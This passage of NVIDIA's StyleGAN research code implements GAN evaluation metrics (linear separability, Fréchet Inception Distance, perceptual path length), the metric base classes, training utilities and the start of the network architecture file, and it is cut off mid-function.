'https://drive.google.com/uc?id=1SEtrVK-TQUC0XeGkBE9y7L8VXfbchyKX', # celebahq-classifier-38-wearing-necklace.pkl 'https://drive.google.com/uc?id=1SF_mJIdyGINXoV-I6IAxHB_k5dxiF6M-', # celebahq-classifier-39-wearing-necktie.pkl ] #---------------------------------------------------------------------------- def prob_normalize(p): p = np.asarray(p).astype(np.float32) assert len(p.shape) == 2 return p / np.sum(p) def mutual_information(p): p = prob_normalize(p) px = np.sum(p, axis=1) py = np.sum(p, axis=0) result = 0.0 for x in range(p.shape[0]): p_x = px[x] for y in range(p.shape[1]): p_xy = p[x][y] p_y = py[y] if p_xy > 0.0: result += p_xy * np.log2(p_xy / (p_x * p_y)) # get bits as output return result def entropy(p): p = prob_normalize(p) result = 0.0 for x in range(p.shape[0]): for y in range(p.shape[1]): p_xy = p[x][y] if p_xy > 0.0: result -= p_xy * np.log2(p_xy) return result def conditional_entropy(p): # H(Y|X) where X corresponds to axis 0, Y to axis 1 # i.e., How many bits of additional information are needed to where we are on axis 1 if we know where we are on axis 0? p = prob_normalize(p) y = np.sum(p, axis=0, keepdims=True) # marginalize to calculate H(Y) return max(0.0, entropy(y) - mutual_information(p)) # can slip just below 0 due to FP inaccuracies, clean those up. #---------------------------------------------------------------------------- class LS(metric_base.MetricBase): def __init__(self, num_samples, num_keep, attrib_indices, minibatch_per_gpu, **kwargs): assert num_keep <= num_samples super().__init__(**kwargs) self.num_samples = num_samples self.num_keep = num_keep self.attrib_indices = attrib_indices self.minibatch_per_gpu = minibatch_per_gpu def _evaluate(self, Gs, num_gpus): minibatch_size = num_gpus * self.minibatch_per_gpu # Construct TensorFlow graph for each GPU. result_expr = [] for gpu_idx in range(num_gpus): with tf.device('/gpu:%d' % gpu_idx): Gs_clone = Gs.clone() # Generate images. latents = tf.random_normal([self.minibatch_per_gpu] + Gs_clone.input_shape[1:]) dlatents = Gs_clone.components.mapping.get_output_for(latents, None, is_validation=True) images = Gs_clone.components.synthesis.get_output_for(dlatents, is_validation=True, randomize_noise=True) # Downsample to 256x256. The attribute classifiers were built for 256x256. if images.shape[2] > 256: factor = images.shape[2] // 256 images = tf.reshape(images, [-1, images.shape[1], images.shape[2] // factor, factor, images.shape[3] // factor, factor]) images = tf.reduce_mean(images, axis=[3, 5]) # Run classifier for each attribute. 
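                # Each pre-trained CelebA-HQ attribute classifier returns a single logit per
                # image; softmax over [logit, -logit] converts it into a two-class probability
                # that is used below both for pruning low-confidence samples and as the SVM
                # target label.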
result_dict = dict(latents=latents, dlatents=dlatents[:,-1]) for attrib_idx in self.attrib_indices: classifier = misc.load_pkl(classifier_urls[attrib_idx]) logits = classifier.get_output_for(images, None) predictions = tf.nn.softmax(tf.concat([logits, -logits], axis=1)) result_dict[attrib_idx] = predictions result_expr.append(result_dict) # Sampling loop. results = [] for _ in range(0, self.num_samples, minibatch_size): results += tflib.run(result_expr) results = {key: np.concatenate([value[key] for value in results], axis=0) for key in results[0].keys()} # Calculate conditional entropy for each attribute. conditional_entropies = defaultdict(list) for attrib_idx in self.attrib_indices: # Prune the least confident samples. pruned_indices = list(range(self.num_samples)) pruned_indices = sorted(pruned_indices, key=lambda i: -np.max(results[attrib_idx][i])) pruned_indices = pruned_indices[:self.num_keep] # Fit SVM to the remaining samples. svm_targets = np.argmax(results[attrib_idx][pruned_indices], axis=1) for space in ['latents', 'dlatents']: svm_inputs = results[space][pruned_indices] try: svm = sklearn.svm.LinearSVC() svm.fit(svm_inputs, svm_targets) svm.score(svm_inputs, svm_targets) svm_outputs = svm.predict(svm_inputs) except: svm_outputs = svm_targets # assume perfect prediction # Calculate conditional entropy. p = [[np.mean([case == (row, col) for case in zip(svm_outputs, svm_targets)]) for col in (0, 1)] for row in (0, 1)] conditional_entropies[space].append(conditional_entropy(p)) # Calculate separability scores. scores = {key: 2**np.sum(values) for key, values in conditional_entropies.items()} self._report_result(scores['latents'], suffix='_z') self._report_result(scores['dlatents'], suffix='_w') #---------------------------------------------------------------------------- File: metrics/frechet_inception_distance.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Frechet Inception Distance (FID).""" import os import numpy as np import scipy import tensorflow as tf import dnnlib.tflib as tflib from metrics import metric_base from training import misc #---------------------------------------------------------------------------- class FID(metric_base.MetricBase): def __init__(self, num_images, minibatch_per_gpu, **kwargs): super().__init__(**kwargs) self.num_images = num_images self.minibatch_per_gpu = minibatch_per_gpu def _evaluate(self, Gs, num_gpus): minibatch_size = num_gpus * self.minibatch_per_gpu inception = misc.load_pkl('https://drive.google.com/uc?id=1MzTY44rLToO5APn8TZmfR7_ENSe5aZUn') # inception_v3_features.pkl activations = np.empty([self.num_images, inception.output_shape[1]], dtype=np.float32) # Calculate statistics for reals. 
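        # FID compares Gaussian fits of the Inception feature distributions:
        #   FID = ||mu_real - mu_fake||^2 + Tr(sigma_real + sigma_fake - 2 * sqrtm(sigma_fake . sigma_real))
        # The real-image statistics are cached on disk so they are computed only once per
        # dataset configuration.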
cache_file = self._get_cache_file_for_reals(num_images=self.num_images) os.makedirs(os.path.dirname(cache_file), exist_ok=True) if os.path.isfile(cache_file): mu_real, sigma_real = misc.load_pkl(cache_file) else: for idx, images in enumerate(self._iterate_reals(minibatch_size=minibatch_size)): begin = idx * minibatch_size end = min(begin + minibatch_size, self.num_images) activations[begin:end] = inception.run(images[:end-begin], num_gpus=num_gpus, assume_frozen=True) if end == self.num_images: break mu_real = np.mean(activations, axis=0) sigma_real = np.cov(activations, rowvar=False) misc.save_pkl((mu_real, sigma_real), cache_file) # Construct TensorFlow graph. result_expr = [] for gpu_idx in range(num_gpus): with tf.device('/gpu:%d' % gpu_idx): Gs_clone = Gs.clone() inception_clone = inception.clone() latents = tf.random_normal([self.minibatch_per_gpu] + Gs_clone.input_shape[1:]) images = Gs_clone.get_output_for(latents, None, is_validation=True, randomize_noise=True) images = tflib.convert_images_to_uint8(images) result_expr.append(inception_clone.get_output_for(images)) # Calculate statistics for fakes. for begin in range(0, self.num_images, minibatch_size): end = min(begin + minibatch_size, self.num_images) activations[begin:end] = np.concatenate(tflib.run(result_expr), axis=0)[:end-begin] mu_fake = np.mean(activations, axis=0) sigma_fake = np.cov(activations, rowvar=False) # Calculate FID. m = np.square(mu_fake - mu_real).sum() s, _ = scipy.linalg.sqrtm(np.dot(sigma_fake, sigma_real), disp=False) # pylint: disable=no-member dist = m + np.trace(sigma_fake + sigma_real - 2*s) self._report_result(np.real(dist)) #---------------------------------------------------------------------------- File: metrics/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. # empty File: metrics/perceptual_path_length.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Perceptual Path Length (PPL).""" import numpy as np import tensorflow as tf import dnnlib.tflib as tflib from metrics import metric_base from training import misc #---------------------------------------------------------------------------- # Normalize batch of vectors. def normalize(v): return v / tf.sqrt(tf.reduce_sum(tf.square(v), axis=-1, keepdims=True)) # Spherical interpolation of a batch of vectors. 
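# For reference, a NumPy sketch of the same interpolation (illustrative only; this helper is
# not part of the metric and assumes the two endpoints are not parallel): normalize both
# endpoints, scale the angle between them by t, and rotate in the plane they span.
def _slerp_np(a, b, t):
    a = a / np.linalg.norm(a, axis=-1, keepdims=True)
    b = b / np.linalg.norm(b, axis=-1, keepdims=True)
    d = np.sum(a * b, axis=-1, keepdims=True)            # cos of the angle between a and b
    p = t * np.arccos(np.clip(d, -1.0, 1.0))             # interpolated angle
    c = b - d * a
    c = c / np.linalg.norm(c, axis=-1, keepdims=True)    # unit vector orthogonal to a
    return a * np.cos(p) + c * np.sin(p)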
def slerp(a, b, t): a = normalize(a) b = normalize(b) d = tf.reduce_sum(a * b, axis=-1, keepdims=True) p = t * tf.math.acos(d) c = normalize(b - d * a) d = a * tf.math.cos(p) + c * tf.math.sin(p) return normalize(d) #---------------------------------------------------------------------------- class PPL(metric_base.MetricBase): def __init__(self, num_samples, epsilon, space, sampling, minibatch_per_gpu, **kwargs): assert space in ['z', 'w'] assert sampling in ['full', 'end'] super().__init__(**kwargs) self.num_samples = num_samples self.epsilon = epsilon self.space = space self.sampling = sampling self.minibatch_per_gpu = minibatch_per_gpu def _evaluate(self, Gs, num_gpus): minibatch_size = num_gpus * self.minibatch_per_gpu # Construct TensorFlow graph. distance_expr = [] for gpu_idx in range(num_gpus): with tf.device('/gpu:%d' % gpu_idx): Gs_clone = Gs.clone() noise_vars = [var for name, var in Gs_clone.components.synthesis.vars.items() if name.startswith('noise')] # Generate random latents and interpolation t-values. lat_t01 = tf.random_normal([self.minibatch_per_gpu * 2] + Gs_clone.input_shape[1:]) lerp_t = tf.random_uniform([self.minibatch_per_gpu], 0.0, 1.0 if self.sampling == 'full' else 0.0) # Interpolate in W or Z. if self.space == 'w': dlat_t01 = Gs_clone.components.mapping.get_output_for(lat_t01, None, is_validation=True) dlat_t0, dlat_t1 = dlat_t01[0::2], dlat_t01[1::2] dlat_e0 = tflib.lerp(dlat_t0, dlat_t1, lerp_t[:, np.newaxis, np.newaxis]) dlat_e1 = tflib.lerp(dlat_t0, dlat_t1, lerp_t[:, np.newaxis, np.newaxis] + self.epsilon) dlat_e01 = tf.reshape(tf.stack([dlat_e0, dlat_e1], axis=1), dlat_t01.shape) else: # space == 'z' lat_t0, lat_t1 = lat_t01[0::2], lat_t01[1::2] lat_e0 = slerp(lat_t0, lat_t1, lerp_t[:, np.newaxis]) lat_e1 = slerp(lat_t0, lat_t1, lerp_t[:, np.newaxis] + self.epsilon) lat_e01 = tf.reshape(tf.stack([lat_e0, lat_e1], axis=1), lat_t01.shape) dlat_e01 = Gs_clone.components.mapping.get_output_for(lat_e01, None, is_validation=True) # Synthesize images. with tf.control_dependencies([var.initializer for var in noise_vars]): # use same noise inputs for the entire minibatch images = Gs_clone.components.synthesis.get_output_for(dlat_e01, is_validation=True, randomize_noise=False) # Crop only the face region. c = int(images.shape[2] // 8) images = images[:, :, c*3 : c*7, c*2 : c*6] # Downsample image to 256x256 if it's larger than that. VGG was built for 224x224 images. if images.shape[2] > 256: factor = images.shape[2] // 256 images = tf.reshape(images, [-1, images.shape[1], images.shape[2] // factor, factor, images.shape[3] // factor, factor]) images = tf.reduce_mean(images, axis=[3,5]) # Scale dynamic range from [-1,1] to [0,255] for VGG. images = (images + 1) * (255 / 2) # Evaluate perceptual distance. img_e0, img_e1 = images[0::2], images[1::2] distance_measure = misc.load_pkl('https://drive.google.com/uc?id=1N2-m9qszOeVC9Tq77WxsLnuWwOedQiD2') # vgg16_zhang_perceptual.pkl distance_expr.append(distance_measure.get_output_for(img_e0, img_e1) * (1 / self.epsilon**2)) # Sampling loop. all_distances = [] for _ in range(0, self.num_samples, minibatch_size): all_distances += tflib.run(distance_expr) all_distances = np.concatenate(all_distances, axis=0) # Reject outliers. 
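        # The lowest 1% and highest 1% of the per-sample path lengths are discarded before
        # taking the mean.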
lo = np.percentile(all_distances, 1, interpolation='lower') hi = np.percentile(all_distances, 99, interpolation='higher') filtered_distances = np.extract(np.logical_and(lo <= all_distances, all_distances <= hi), all_distances) self._report_result(np.mean(filtered_distances)) #---------------------------------------------------------------------------- File: metrics/metric_base.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Common definitions for GAN metrics.""" import os import time import hashlib import numpy as np import tensorflow as tf import dnnlib import dnnlib.tflib as tflib import config from training import misc from training import dataset #---------------------------------------------------------------------------- # Standard metrics. fid50k = dnnlib.EasyDict(func_name='metrics.frechet_inception_distance.FID', name='fid50k', num_images=50000, minibatch_per_gpu=8) ppl_zfull = dnnlib.EasyDict(func_name='metrics.perceptual_path_length.PPL', name='ppl_zfull', num_samples=100000, epsilon=1e-4, space='z', sampling='full', minibatch_per_gpu=16) ppl_wfull = dnnlib.EasyDict(func_name='metrics.perceptual_path_length.PPL', name='ppl_wfull', num_samples=100000, epsilon=1e-4, space='w', sampling='full', minibatch_per_gpu=16) ppl_zend = dnnlib.EasyDict(func_name='metrics.perceptual_path_length.PPL', name='ppl_zend', num_samples=100000, epsilon=1e-4, space='z', sampling='end', minibatch_per_gpu=16) ppl_wend = dnnlib.EasyDict(func_name='metrics.perceptual_path_length.PPL', name='ppl_wend', num_samples=100000, epsilon=1e-4, space='w', sampling='end', minibatch_per_gpu=16) ls = dnnlib.EasyDict(func_name='metrics.linear_separability.LS', name='ls', num_samples=200000, num_keep=100000, attrib_indices=range(40), minibatch_per_gpu=4) dummy = dnnlib.EasyDict(func_name='metrics.metric_base.DummyMetric', name='dummy') # for debugging #---------------------------------------------------------------------------- # Base class for metrics. 
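# A concrete metric subclasses MetricBase and overrides _evaluate(); run() loads the network
# pickle into a fresh graph and session, times the evaluation, and logs the values collected
# through _report_result(). The EasyDicts above are turned into metric instances via
# dnnlib.util.call_func_by_name (see MetricGroup below).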
class MetricBase: def __init__(self, name): self.name = name self._network_pkl = None self._dataset_args = None self._mirror_augment = None self._results = [] self._eval_time = None def run(self, network_pkl, run_dir=None, dataset_args=None, mirror_augment=None, num_gpus=1, tf_config=None, log_results=True): self._network_pkl = network_pkl self._dataset_args = dataset_args self._mirror_augment = mirror_augment self._results = [] if (dataset_args is None or mirror_augment is None) and run_dir is not None: run_config = misc.parse_config_for_previous_run(run_dir) self._dataset_args = dict(run_config['dataset']) self._dataset_args['shuffle_mb'] = 0 self._mirror_augment = run_config['train'].get('mirror_augment', False) time_begin = time.time() with tf.Graph().as_default(), tflib.create_session(tf_config).as_default(): # pylint: disable=not-context-manager _G, _D, Gs = misc.load_pkl(self._network_pkl) self._evaluate(Gs, num_gpus=num_gpus) self._eval_time = time.time() - time_begin if log_results: result_str = self.get_result_str() if run_dir is not None: log = os.path.join(run_dir, 'metric-%s.txt' % self.name) with dnnlib.util.Logger(log, 'a'): print(result_str) else: print(result_str) def get_result_str(self): network_name = os.path.splitext(os.path.basename(self._network_pkl))[0] if len(network_name) > 29: network_name = '...' + network_name[-26:] result_str = '%-30s' % network_name result_str += ' time %-12s' % dnnlib.util.format_time(self._eval_time) for res in self._results: result_str += ' ' + self.name + res.suffix + ' ' result_str += res.fmt % res.value return result_str def update_autosummaries(self): for res in self._results: tflib.autosummary.autosummary('Metrics/' + self.name + res.suffix, res.value) def _evaluate(self, Gs, num_gpus): raise NotImplementedError # to be overridden by subclasses def _report_result(self, value, suffix='', fmt='%-10.4f'): self._results += [dnnlib.EasyDict(value=value, suffix=suffix, fmt=fmt)] def _get_cache_file_for_reals(self, extension='pkl', **kwargs): all_args = dnnlib.EasyDict(metric_name=self.name, mirror_augment=self._mirror_augment) all_args.update(self._dataset_args) all_args.update(kwargs) md5 = hashlib.md5(repr(sorted(all_args.items())).encode('utf-8')) dataset_name = self._dataset_args['tfrecord_dir'].replace('\\', '/').split('/')[-1] return os.path.join(config.cache_dir, '%s-%s-%s.%s' % (md5.hexdigest(), self.name, dataset_name, extension)) def _iterate_reals(self, minibatch_size): dataset_obj = dataset.load_dataset(data_dir=config.data_dir, **self._dataset_args) while True: images, _labels = dataset_obj.get_minibatch_np(minibatch_size) if self._mirror_augment: images = misc.apply_mirror_augment(images) yield images def _iterate_fakes(self, Gs, minibatch_size, num_gpus): while True: latents = np.random.randn(minibatch_size, *Gs.input_shape[1:]) fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True) images = Gs.run(latents, None, output_transform=fmt, is_validation=True, num_gpus=num_gpus, assume_frozen=True) yield images #---------------------------------------------------------------------------- # Group of multiple metrics. 
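# A single metric can also be evaluated directly. Minimal usage sketch (illustrative only;
# the pickle path and dataset arguments are hypothetical and this helper is not called
# anywhere in the codebase):
def _example_run_fid50k(network_pkl='results/00000-sgan-ffhq-8gpu/network-final.pkl'):
    metric = dnnlib.util.call_func_by_name(**fid50k)
    metric.run(network_pkl, dataset_args=dnnlib.EasyDict(tfrecord_dir='ffhq', shuffle_mb=0),
               mirror_augment=True, num_gpus=1, log_results=False)
    print(metric.get_result_str())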
class MetricGroup: def __init__(self, metric_kwarg_list): self.metrics = [dnnlib.util.call_func_by_name(**kwargs) for kwargs in metric_kwarg_list] def run(self, *args, **kwargs): for metric in self.metrics: metric.run(*args, **kwargs) def get_result_str(self): return ' '.join(metric.get_result_str() for metric in self.metrics) def update_autosummaries(self): for metric in self.metrics: metric.update_autosummaries() #---------------------------------------------------------------------------- # Dummy metric for debugging purposes. class DummyMetric(MetricBase): def _evaluate(self, Gs, num_gpus): _ = Gs, num_gpus self._report_result(0.0) #---------------------------------------------------------------------------- File: training/misc.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Miscellaneous utility functions.""" import os import glob import pickle import re import numpy as np from collections import defaultdict import PIL.Image import dnnlib import config from training import dataset #---------------------------------------------------------------------------- # Convenience wrappers for pickle that are able to load data produced by # older versions of the code, and from external URLs. def open_file_or_url(file_or_url): if dnnlib.util.is_url(file_or_url): return dnnlib.util.open_url(file_or_url, cache_dir=config.cache_dir) return open(file_or_url, 'rb') def load_pkl(file_or_url): with open_file_or_url(file_or_url) as file: return pickle.load(file, encoding='latin1') def save_pkl(obj, filename): with open(filename, 'wb') as file: pickle.dump(obj, file, protocol=pickle.HIGHEST_PROTOCOL) #---------------------------------------------------------------------------- # Image utils. 
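# adjust_dynamic_range() below maps values linearly from drange_in to drange_out. For example,
# drange_in=[-1, 1] with drange_out=[0, 255] gives scale = 255 / 2 = 127.5 and
# bias = 0 - (-1) * 127.5 = 127.5, i.e. x -> x * 127.5 + 127.5.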
def adjust_dynamic_range(data, drange_in, drange_out): if drange_in != drange_out: scale = (np.float32(drange_out[1]) - np.float32(drange_out[0])) / (np.float32(drange_in[1]) - np.float32(drange_in[0])) bias = (np.float32(drange_out[0]) - np.float32(drange_in[0]) * scale) data = data * scale + bias return data def create_image_grid(images, grid_size=None): assert images.ndim == 3 or images.ndim == 4 num, img_w, img_h = images.shape[0], images.shape[-1], images.shape[-2] if grid_size is not None: grid_w, grid_h = tuple(grid_size) else: grid_w = max(int(np.ceil(np.sqrt(num))), 1) grid_h = max((num - 1) // grid_w + 1, 1) grid = np.zeros(list(images.shape[1:-2]) + [grid_h * img_h, grid_w * img_w], dtype=images.dtype) for idx in range(num): x = (idx % grid_w) * img_w y = (idx // grid_w) * img_h grid[..., y : y + img_h, x : x + img_w] = images[idx] return grid def convert_to_pil_image(image, drange=[0,1]): assert image.ndim == 2 or image.ndim == 3 if image.ndim == 3: if image.shape[0] == 1: image = image[0] # grayscale CHW => HW else: image = image.transpose(1, 2, 0) # CHW -> HWC image = adjust_dynamic_range(image, drange, [0,255]) image = np.rint(image).clip(0, 255).astype(np.uint8) fmt = 'RGB' if image.ndim == 3 else 'L' return PIL.Image.fromarray(image, fmt) def save_image(image, filename, drange=[0,1], quality=95): img = convert_to_pil_image(image, drange) if '.jpg' in filename: img.save(filename,"JPEG", quality=quality, optimize=True) else: img.save(filename) def save_image_grid(images, filename, drange=[0,1], grid_size=None): convert_to_pil_image(create_image_grid(images, grid_size), drange).save(filename) #---------------------------------------------------------------------------- # Locating results. def locate_run_dir(run_id_or_run_dir): if isinstance(run_id_or_run_dir, str): if os.path.isdir(run_id_or_run_dir): return run_id_or_run_dir converted = dnnlib.submission.submit.convert_path(run_id_or_run_dir) if os.path.isdir(converted): return converted run_dir_pattern = re.compile('^0*%s-' % str(run_id_or_run_dir)) for search_dir in ['']: full_search_dir = config.result_dir if search_dir == '' else os.path.normpath(os.path.join(config.result_dir, search_dir)) run_dir = os.path.join(full_search_dir, str(run_id_or_run_dir)) if os.path.isdir(run_dir): return run_dir run_dirs = sorted(glob.glob(os.path.join(full_search_dir, '*'))) run_dirs = [run_dir for run_dir in run_dirs if run_dir_pattern.match(os.path.basename(run_dir))] run_dirs = [run_dir for run_dir in run_dirs if os.path.isdir(run_dir)] if len(run_dirs) == 1: return run_dirs[0] raise IOError('Cannot locate result subdir for run', run_id_or_run_dir) def list_network_pkls(run_id_or_run_dir, include_final=True): run_dir = locate_run_dir(run_id_or_run_dir) pkls = sorted(glob.glob(os.path.join(run_dir, 'network-*.pkl'))) if len(pkls) >= 1 and os.path.basename(pkls[0]) == 'network-final.pkl': if include_final: pkls.append(pkls[0]) del pkls[0] return pkls def locate_network_pkl(run_id_or_run_dir_or_network_pkl, snapshot_or_network_pkl=None): for candidate in [snapshot_or_network_pkl, run_id_or_run_dir_or_network_pkl]: if isinstance(candidate, str): if os.path.isfile(candidate): return candidate converted = dnnlib.submission.submit.convert_path(candidate) if os.path.isfile(converted): return converted pkls = list_network_pkls(run_id_or_run_dir_or_network_pkl) if len(pkls) >= 1 and snapshot_or_network_pkl is None: return pkls[-1] for pkl in pkls: try: name = os.path.splitext(os.path.basename(pkl))[0] number = int(name.split('-')[-1]) if number 
== snapshot_or_network_pkl: return pkl except ValueError: pass except IndexError: pass raise IOError('Cannot locate network pkl for snapshot', snapshot_or_network_pkl) def get_id_string_for_network_pkl(network_pkl): p = network_pkl.replace('.pkl', '').replace('\\', '/').split('/') return '-'.join(p[max(len(p) - 2, 0):]) #---------------------------------------------------------------------------- # Loading data from previous training runs. def load_network_pkl(run_id_or_run_dir_or_network_pkl, snapshot_or_network_pkl=None): return load_pkl(locate_network_pkl(run_id_or_run_dir_or_network_pkl, snapshot_or_network_pkl)) def parse_config_for_previous_run(run_id): run_dir = locate_run_dir(run_id) # Parse config.txt. cfg = defaultdict(dict) with open(os.path.join(run_dir, 'config.txt'), 'rt') as f: for line in f: line = re.sub(r"^{?\s*'(\w+)':\s*{(.*)(},|}})$", r"\1 = {\2}", line.strip()) if line.startswith('dataset =') or line.startswith('train ='): exec(line, cfg, cfg) # pylint: disable=exec-used # Handle legacy options. if 'file_pattern' in cfg['dataset']: cfg['dataset']['tfrecord_dir'] = cfg['dataset'].pop('file_pattern').replace('-r??.tfrecords', '') if 'mirror_augment' in cfg['dataset']: cfg['train']['mirror_augment'] = cfg['dataset'].pop('mirror_augment') if 'max_labels' in cfg['dataset']: v = cfg['dataset'].pop('max_labels') if v is None: v = 0 if v == 'all': v = 'full' cfg['dataset']['max_label_size'] = v if 'max_images' in cfg['dataset']: cfg['dataset'].pop('max_images') return cfg def load_dataset_for_previous_run(run_id, **kwargs): # => dataset_obj, mirror_augment cfg = parse_config_for_previous_run(run_id) cfg['dataset'].update(kwargs) dataset_obj = dataset.load_dataset(data_dir=config.data_dir, **cfg['dataset']) mirror_augment = cfg['train'].get('mirror_augment', False) return dataset_obj, mirror_augment def apply_mirror_augment(minibatch): mask = np.random.rand(minibatch.shape[0]) < 0.5 minibatch = np.array(minibatch) minibatch[mask] = minibatch[mask, :, :, ::-1] return minibatch #---------------------------------------------------------------------------- # Size and contents of the image snapshot grids that are exported # periodically during training. def setup_snapshot_image_grid(G, training_set, size = '1080p', # '1080p' = to be viewed on 1080p display, '4k' = to be viewed on 4k display. layout = 'random'): # 'random' = grid contents are selected randomly, 'row_per_class' = each row corresponds to one class label. # Select size. gw = 1; gh = 1 if size == '1080p': gw = np.clip(1920 // G.output_shape[3], 3, 32) gh = np.clip(1080 // G.output_shape[2], 2, 32) if size == '4k': gw = np.clip(3840 // G.output_shape[3], 7, 32) gh = np.clip(2160 // G.output_shape[2], 4, 32) # Initialize data arrays. reals = np.zeros([gw * gh] + training_set.shape, dtype=training_set.dtype) labels = np.zeros([gw * gh, training_set.label_size], dtype=training_set.label_dtype) latents = np.random.randn(gw * gh, *G.input_shape[1:]) # Random layout. if layout == 'random': reals[:], labels[:] = training_set.get_minibatch_np(gw * gh) # Class-conditional layouts. 
class_layouts = dict(row_per_class=[gw,1], col_per_class=[1,gh], class4x4=[4,4]) if layout in class_layouts: bw, bh = class_layouts[layout] nw = (gw - 1) // bw + 1 nh = (gh - 1) // bh + 1 blocks = [[] for _i in range(nw * nh)] for _iter in range(1000000): real, label = training_set.get_minibatch_np(1) idx = np.argmax(label[0]) while idx < len(blocks) and len(blocks[idx]) >= bw * bh: idx += training_set.label_size if idx < len(blocks): blocks[idx].append((real, label)) if all(len(block) >= bw * bh for block in blocks): break for i, block in enumerate(blocks): for j, (real, label) in enumerate(block): x = (i % nw) * bw + j % bw y = (i // nw) * bh + j // bw if x < gw and y < gh: reals[x + y * gw] = real[0] labels[x + y * gw] = label[0] return (gw, gh), reals, labels, latents #---------------------------------------------------------------------------- File: training/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. # empty File: training/networks_stylegan.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Network architectures used in the StyleGAN paper.""" import numpy as np import tensorflow as tf import dnnlib import dnnlib.tflib as tflib # NOTE: Do not import any application-specific modules here! # Specify all network parameters as kwargs. #---------------------------------------------------------------------------- # Primitive ops for manipulating 4D activation tensors. # The gradients of these are not necessary efficient or even meaningful. def _blur2d(x, f=[1,2,1], normalize=True, flip=False, stride=1): assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:]) assert isinstance(stride, int) and stride >= 1 # Finalize filter kernel. f = np.array(f, dtype=np.float32) if f.ndim == 1: f = f[:, np.newaxis] * f[np.newaxis, :] assert f.ndim == 2 if normalize: f /= np.sum(f) if flip: f = f[::-1, ::-1] f = f[:, :, np.newaxis, np.newaxis] f = np.tile(f, [1, 1, int(x.shape[1]), 1]) # No-op => early exit. if f.shape == (1, 1) and f[0,0] == 1: return x # Convolve using depthwise_conv2d. orig_dtype = x.dtype x = tf.cast(x, tf.float32) # tf.nn.depthwise_conv2d() doesn't support fp16 f = tf.constant(f, dtype=x.dtype, name='filter') strides = [1, 1, stride, stride] x = tf.nn.depthwise_conv2d(x, f, strides=strides, padding='SAME', data_format='NCHW') x = tf.cast(x, orig_dtype) return x def _upscale2d(x, factor=2, gain=1): assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:]) assert isinstance(factor, int) and factor >= 1 # Apply gain. if gain != 1: x *= gain # No-op => early exit. if factor == 1: return x # Upscale using tf.tile(). 
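    # Nearest-neighbour upsampling: insert a singleton axis after each spatial dimension,
    # tile it by `factor`, and merge, i.e. [N, C, H, W] -> [N, C, H, 1, W, 1]
    # -> [N, C, H, factor, W, factor] -> [N, C, H * factor, W * factor].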
s = x.shape x = tf.reshape(x, [-1, s[1], s[2], 1, s[3], 1]) x = tf.tile(x, [1, 1, 1, factor, 1, factor]) x = tf.reshape(x, [-1, s[1], s[2] * factor, s[3] * factor]) return x def _downscale2d(x, factor=2, gain=1): assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:]) assert isinstance(factor, int) and factor >= 1 # 2x2, float32 => downscale using _blur2d(). if factor == 2 and x.dtype == tf.float32: f = [np.sqrt(gain) / factor] * factor return _blur2d(x, f=f, normalize=False, stride=factor) # Apply gain. if gain != 1: x *= gain # No-op => early exit. if factor == 1: return x # Large factor => downscale using tf.nn.avg_pool(). # NOTE: Requires tf_config['graph_options.place_pruned_graph']=True to work. ksize = [1, 1, factor, factor] return tf.nn.avg_pool(x, ksize=ksize, strides=ksize, padding='VALID', data_format='NCHW') #---------------------------------------------------------------------------- # High-level ops for manipulating 4D activation tensors. # The gradients of these are meant to be as efficient as possible. def blur2d(x, f=[1,2,1], normalize=True): with tf.variable_scope('Blur2D'): @tf.custom_gradient def func(x): y = _blur2d(x, f, normalize) @tf.custom_gradient def grad(dy): dx = _blur2d(dy, f, normalize, flip=True) return dx, lambda ddx: _blur2d(ddx, f, normalize) return y, grad return func(x) def upscale2d(x, factor=2): with tf.variable_scope('Upscale2D'): @tf.custom_gradient def func(x): y = _upscale2d(x, factor) @tf.custom_gradient def grad(dy): dx = _downscale2d(dy, factor, gain=factor**2) return dx, lambda ddx: _upscale2d(ddx, factor) return y, grad return func(x) def downscale2d(x, factor=2): with tf.variable_scope('Downscale2D'): @tf.custom_gradient def func(x): y = _downscale2d(x, factor) @tf.custom_gradient def grad(dy): dx = _upscale2d(dy, factor, gain=1/factor**2) return dx, lambda ddx: _downscale2d(ddx, factor) return y, grad return func(x) #---------------------------------------------------------------------------- # Get/create weight tensor for a convolutional or fully-connected layer. def get_weight(shape, gain=np.sqrt(2), use_wscale=False, lrmul=1): fan_in = np.prod(shape[:-1]) # [kernel, kernel, fmaps_in, fmaps_out] or [in, out] he_std = gain / np.sqrt(fan_in) # He init # Equalized learning rate and custom learning rate multiplier. if use_wscale: init_std = 